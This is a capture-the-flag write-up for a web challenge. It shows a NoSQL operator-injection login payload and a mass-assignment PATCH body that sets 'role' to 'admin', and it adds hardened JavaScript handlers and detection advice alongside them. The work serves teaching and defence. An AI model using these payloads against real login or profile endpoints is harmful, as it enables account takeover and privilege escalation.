Expensiel Writeup
The only real thing I had to go on was the login endpoint with its JSON response. I tried banner grabbing and port scanning, but nothing stood out apart from that JSON response. The only thing that made any sense was some kind of NoSQL injection.
The NoSQL payload that ended up working was:
```json
{
  "email": { "$ne": null, "$exists": true },
  "password": { "$ne": null, "$exists": true }
}
```
I could now open the request in the browser via Burp and navigate to /dashboard. I was now logged in as Dana:
I went to look at the settings. The first thing that stood out to me was the "Role" of "Employee":
When saving the profile, it was submitted with a PATCH request.
This made me think I could simply add a role field to the submission. I tried it and received a response of `"ok":true`:
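Why that payload logs in as the first user, and the check that stops it, as an added example (not code from the writeup or from the target application): the login handler below models an Express-style app passing the parsed JSON body straight into a MongoDB filter. The in-memory `findOne` and its `$ne`/`$exists` matcher, the user record and the `loginVulnerable`/`loginHardened` names are all constructed for this illustration.

```javascript
// Constructed sample of the users collection (no real credentials).
const USERS = [
  { email: 'dana@example.test', password: 'hunter2-hash', role: 'employee' },
];

// Tiny stand-in for a MongoDB findOne matcher. Assumption: only the two
// operators used in the writeup's payload ($ne, $exists) are modelled.
function matchField(value, cond) {
  if (cond !== null && typeof cond === 'object') {
    if ('$ne' in cond && value === cond.$ne) return false;
    if ('$exists' in cond && (value !== undefined) !== cond.$exists) return false;
    return true; // every operator in the condition was satisfied
  }
  return value === cond; // plain equality for scalar conditions
}

function findOne(collection, query) {
  return collection.find(doc =>
    Object.keys(query).every(k => matchField(doc[k], query[k]))
  ) || null;
}

// Vulnerable pattern: body fields become query values as-is, so an object
// such as {"$ne": null} is interpreted as an operator, not as a literal.
function loginVulnerable(body) {
  return findOne(USERS, { email: body.email, password: body.password });
}

// Hardened pattern: both credential fields must be strings before any
// query is built. Objects, arrays, numbers and missing fields are rejected
// (the real handler would answer HTTP 400 and log the event).
function loginHardened(body) {
  if (typeof body.email !== 'string' || typeof body.password !== 'string') {
    return null;
  }
  return findOne(USERS, { email: body.email, password: body.password });
}
```

A schema validator (for example rejecting any non-string value on these two keys) achieves the same thing declaratively; the essential point is that the type check happens before the driver ever sees the value. Authentication attempts whose credential fields are not strings are also a cheap, high-signal detection rule for the application log.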
```json
{
  "name": "Dana Whitfield",
  "phone": "(503) 555-0142",
  "department": "Outreach",
  "payoutLast4": "4417",
  "role": "admin",
  "notifyEmail": true
}
```
Mass assignment seemed like the best option here, and it was the right one, because I now had an Administrator console available:
From the admin console, I could grab the flag:
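The fix for the PATCH step is an allow-list of self-editable fields. As an added example (not the target application's code), the two functions below contrast a handler that merges the whole request body into the stored record with one that applies only known fields and reports the rest. The field names follow the profile JSON in this writeup; the sample user record and the function names are constructed for the illustration.

```javascript
// Fields a user may change on their own profile. Everything else
// (role, payoutLast4, id, ...) is server-controlled.
const EDITABLE_FIELDS = ['name', 'phone', 'department', 'notifyEmail'];

// Vulnerable pattern: every key in the body overwrites the record,
// so an extra "role": "admin" is stored like any other field.
function patchProfileVulnerable(user, body) {
  return Object.assign({}, user, body);
}

// Hardened pattern: copy only allow-listed keys; collect the rest so the
// handler can reject the request (or at least log it) instead of silently
// dropping a privilege-escalation attempt.
function patchProfileHardened(user, body) {
  const updated = { ...user };
  const rejected = [];
  for (const [key, value] of Object.entries(body)) {
    if (EDITABLE_FIELDS.includes(key)) {
      updated[key] = value;
    } else {
      rejected.push(key);
    }
  }
  return { updated, rejected };
}

// Constructed demo: the stored record and a PATCH body carrying a role.
const dana = { name: 'Dana Whitfield', role: 'employee', payoutLast4: '4417' };
const body = { name: 'Dana Whitfield', role: 'admin' };
console.log(patchProfileVulnerable(dana, body).role);          // admin
console.log(patchProfileHardened(dana, body).rejected);        // [ 'role' ]
```

Returning the rejected keys is deliberate: a PATCH that names `role` or `payoutLast4` from an ordinary session is a clear indicator worth alerting on, whereas a handler that silently ignores unknown keys hides the attempt.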
flag: WEBVERSE{f9cccXXXXXXXXXXXXXXXXXXXXXXXXXXX}